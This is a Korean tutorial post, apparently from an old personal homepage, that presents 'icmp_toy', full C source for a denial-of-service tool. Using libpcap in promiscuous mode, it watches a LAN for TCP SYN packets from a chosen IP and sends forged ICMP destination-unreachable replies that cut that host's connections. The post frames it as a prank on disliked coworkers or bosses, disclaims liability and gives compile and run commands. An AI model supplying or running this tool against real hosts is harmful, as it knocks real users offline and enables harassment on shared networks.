Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다.
연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다.
#########################################################################
# ICMP패킷을 이용한 장난감
#
# 글쓴이 : 노광민
# email : dalgu2@orgio.net
# homepage : http://myhome.shinbiro.com/~nkm24
#########################################################################
안녕하십니까 리눅스에서 pcap library를 사용하여 패킷을 잡아보기란 글을 올렸던 노광민입니다.
이글은 제가 올렸던 위의글을 읽어보셨다는 가정하에 이젠 무엇을 해 볼까 고민하는 분들을 위해 재미있는 장난감 하나를 소개하고자 합니다.
이 장난감을 갖고 놀기 위한 조건은 아래와 같습니다.
경우 1
1.1 맘에 안 드는 사람이 있다.
1.2 그 사람과 난 같은 네트웍 세트먼트안에서 컴을 쓰고 있다.
1.3 그 사람은 하루라도 인터넷을 쓰지 않으면 미치버리는 사람이다.
1.4 그 사람을 미쳐버리게 하고 싶다.
경우 2
2.1 맨날 앉아서 펜대 굴리면서 결재만 하는 보기싫은 상사가 있다.
2.2 그 상사와 난 같은 네트웍 세트먼트안에서 컴을 쓰고 있다.
2.3 조금만 딴짓 하면 소리지르면서 자기는 맨날 증권만 한다.
2.4 가서 머리박을 한 대 쥐어박고 싶지만 딸린 처자식이 있어서 그렇게 못한다.
2.5 저 놈을 어떻게 미쳐버리게 하지…
경우 3
3.1 그 놈과 나는 마주본다.
3.2 그 놈과 난 같은 네트웍 세트먼트안에서 컴을 쓰고 있다.
3.3 눈이 돌아가는 것을 가만히 보면 분명 딴 짓을 하고 있다.
3.4 내가 다가가면 재빨리 마우스 조작을 한다.
3.5 모니터 화면을 보면 각종 서류 편집 화면만 보인다.
3.6 이 놈 분명히 딴 짓 하고 있는데 손가락 겁나게 빠르네…
경우 4
4.1 프로젝트가 치명적인 버그 때문에 막혀있다.
4.2 그런데도 그 놈은 아랑곳하지 않고 게임만 한다.
4.3 성질이 더러워서 건들지도 못하겠다.
4.4 이 놈을 어떻게 하지…
조건이 충족된다면 아래의 글을 읽어주십시요…
참고로 이 것을 이용하여 일어난 인적,물적 피해에 대해서는 저는 절대로 책임을 지지 않습니다. 이것에 동의 하시는 분만 이 장난감을 이용할 권리를 드립니다.
제가 소개하고자 하는 소스는 ping 프로그램에서 이용하는 icmp packet를 이용한 간단한 hacking source입니다.
전에 올렸던 글에서 처럼 pcap library를 이용하여 원하는 호스트의 패킷을 획득하여 차단 패킷을 전송하는 원리로 되어있습니다.
자세한 설명은 소스에 나와 있으니 참고바랍니다.
참고로 저는 프로그램 초보입니다.
컴파일하면 waring이 뜰 겁니다. 어떻게 없애는지 잘 모르겠습니다. 가르쳐 주실분은 멜 주세요…^^
여기에 나와 있는 소스는 UNP(UNIX NETWORK PROGRAMMING Volumn1 second edition)와 tcpdump를 참조하여 study -> copy -> paste -> replace -> rebuild의 과정을 거친 소스입니다.
소스가 약간 지저분하더라고 양해 바라며 제가 약간 첨가한 부분은 ping 프로그램을 참고하여 icmp error packet을 만들어 보내는 부분 정도입니다.
누군가 그러더군요. 진정한 프로그래머는 이 세상에서 몇 명 안 된다고…
난 언제쯤 책 안보고 프로그래밍 할 수 있을까…
참 전에 올렸던 소스도 컴파일이 안 되다는 멜을 받았는데 대부분이
bpf.h가 없다는 에러였습니다.
1 2 |
]# cp -f /usr/include/pcap/net/bpf.h /usr/include/net ]# gcc -g -Wall -o icmp_toy icmp_toy.c -lpcap |
이렇게 컴파일하시면 됩니다. 컴파일하기 귀찮으시면 저의 홈페이지 바이너리를 링크시켜 놓았으니 받아가시기 바랍니다.(intel x86) 자기 리눅스 박스에서 먼저 테스트를 해 보세요…
1 |
#./icmp_toy xxx.xxx.xxx.xxx |
위와 같이 한다음 다른 창에서 telnet이나 web을 이용해 보세요…^^
장미 한 송이를 받게 될 겁니다…^^
xxx.xxx.xxx.xxx은 본인의 컴 ip address입니다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 |
]# vi icmp_toy.c #include <sys/types.h> #include <sys/time.h> #include <netinet/in.h> #include <net/ethernet.h> #include <pcap/pcap.h> // libpcap를 위한 헤더화일 #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/ip_icmp.h> #define PROMISCUOUS 1 // 자식 프로세스 생성 개수 static int nchild = 5; char target_ip[16]; static pid_t *pids; static pcap_t *pd; /* checksum 알고리즘를 구현한 함수 나는 copy & paste 히히 */ unsigned short in_cksum(unsigned short *addr, int len) { int nleft = len; int sum = 0; unsigned short *w = addr; unsigned short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(unsigned char *) (&answer) = *(unsigned char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } /* -------------------------------------------------------------------- icmp packet 을 만들어 보내는 함수 : 넌 이제 인터넷과 고립되는 거야!! -------------------------------------------------------------------*/ void send_icmp(int sockfd, struct iphdr *iph, struct tcphdr *tcph) { char buff[36]; // icmp packet 의 전체부분 char data[28]; //icmp data 부분 ip header:20bytes + ulp header:8bytes /* 화면에 찍기 위해 ip를 임시저장하기 위한 공간 */ int len; struct sockaddr send; struct icmp *icmp; struct sockaddr_in *willsend; willsend = (struct sockaddr_in *) &send; willsend->sin_family = AF_INET; willsend->sin_addr.s_addr = iph->saddr; fprintf(stdout,\"A player\'s number is (%d) : Shot!! ---<-@ %s n\", getpid(), target_ip); icmp = (struct icmp *) buff; // 목적지 미도달 : ICMP type icmp->icmp_type = ICMP_DEST_UNREACH; icmp->icmp_code = ICMP_PROT_UNREACH; icmp->icmp_id = 0; icmp->icmp_seq = 0; // icmp data 부분중에 패킷의 ip header memcpy(data, iph, 20); // icmp data 부분중에 패킷의 Upper Layer Protocol의 상위 8 bytes memcpy(data + 20, tcph, 8); // data부분을 icmp_data부분에 대입 memcpy(icmp->icmp_data, data, 28); // 보내게 될 icmp packet의 길이 : 36 bytes len = 8 + 20 + 8; // icmp checksum field 계산 icmp->icmp_cksum= 0; icmp->icmp_cksum= in_cksum((u_short *) icmp, len); // 완성된 ICMP packet 보내기 sendto(sockfd, buff, len, 0, &send, sizeof(send)); } // 장난 칠 놈 컴ip void checkip(struct iphdr *iph, struct tcphdr *tcph) { int sockfd; char source_ip[16]; strcpy(source_ip, (char *)inet_ntoa(iph->saddr)); sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); //ip 비교 아님 말구... if ( strcmp(target_ip, source_ip) == 0 ) send_icmp(sockfd, iph, tcph); close(sockfd); } // ip header와 tcp header를 mapping void packet_info(char *user, int len) { struct iphdr *iph; struct tcphdr *tcph; // ip header 를 포인터 iph = (struct iphdr *) user; // tcp header 를 포인터 tcph = (struct tcphdr *) (user + iph->ihl *4); checkip(iph, tcph); } void sig_int(int sig) { int i; // 모든 자식프로세스를 죽인다. for(i=0; i<nchild; i++) kill(pids[i],SIGTERM); /* --------------------------------------------- 모든 자식 프로세스가 죽을 때까지 기다린다. 더 이상 자식프로세스가 없으면 wait()는 -1를 리턴하기 때문에 while loop를 빠져나오게 되고 부모도 exit(0)에 의해 종료한다. --------------------------------------------*/ while(wait(NULL) > 0) ; fprintf(stdout,\"Bye!!n\"); exit(0); } // prefork방식을 이용한 child pool 만들기 pid_t child_make(int i, pcap_t *pd, int datalink) { pid_t pid; void child_main(int, pcap_t *, int); if ((pid=fork()) > 0) { return (pid); // parent 인경우 자식프로세스의 pid를 리턴 } // child인 경우 아래 함수 호출 child_main(i, pd, datalink); } void child_main(int i, pcap_t *pd, int datalink) { void packet_loop(pcap_t *, int); printf(\"CHILD %ld startingn\", (long) getpid()); packet_loop(pd, datalink); } // unp에 있다. char *next_pcap(pcap_t *pd, int *len) { char *ptr; struct pcap_pkthdr hdr; while( (ptr = (char *) pcap_next(pd, &hdr)) == NULL) ; *len = hdr.caplen; return (ptr); } void packet_loop(pcap_t *pd, int datalink) { int len; char *ptr; /* ----------------------------------------------- 계속적으로 packet을 읽어들이는 loop ---------------------------------------------*/ for(;;) { ptr = next_pcap(pd, &len); switch (datalink) { case DLT_EN10MB : packet_info(ptr+14, len-14); break; } } } void usage(void) { fprintf(stdout, \"SYNOPSIS : icmp_toy xxx.xxx.xxx.xxx(target ip address)n\"); } int main(int argc, char *argv[]) { struct bpf_program fcode; char *device, *filter_rule; char ebuf[PCAP_ERRBUF_SIZE]; int i, j, snaplen = 68; bpf_u_int32 localnet, netmask; //시그널 등록 signal(SIGINT, sig_int); if(argc < 2) { usage(); exit(1); } // 장난 칠 컴퓨터 호스트 주소를 복사... strcpy(target_ip, argv[1]); /* --------------------------------------- tcp syn packet만 필터링한다 --------------------------------------*/ filter_rule = \"tcp and tcp[13:1] & 2 != 0\"; //filter_rule = \"ip\"; device = pcap_lookupdev(ebuf); if(device == NULL) { perror(ebuf); exit(1); } pd = pcap_open_live(device, snaplen, PROMISCUOUS, 1000, ebuf); if(pd == NULL) { perror(ebuf); exit(1); } i = pcap_snapshot(pd); if(snaplen < i) { perror(ebuf); exit(1); } if(pcap_lookupnet(device, &localnet, &netmask, ebuf) < 0) { perror(ebuf); exit(1); } setuid(getuid()); if(pcap_compile(pd, &fcode, filter_rule, 0, netmask) < 0) { perror(ebuf); exit(1); } if(pcap_setfilter(pd, &fcode) < 0) { perror(ebuf); exit(1); } fflush(stderr); pids = calloc(nchild, sizeof(pid_t)); /* ---------------------------------------------- nchild 만큼 자식프로세스를 생성하기 위한 loop --------------------------------------------*/ for(j=0; j<nchild; j++) pids[j] = child_make(j, pd, pcap_datalink(pd)); for(;;) pause(); // signal 이 발생할때까지 실행을 지연시킨다. } |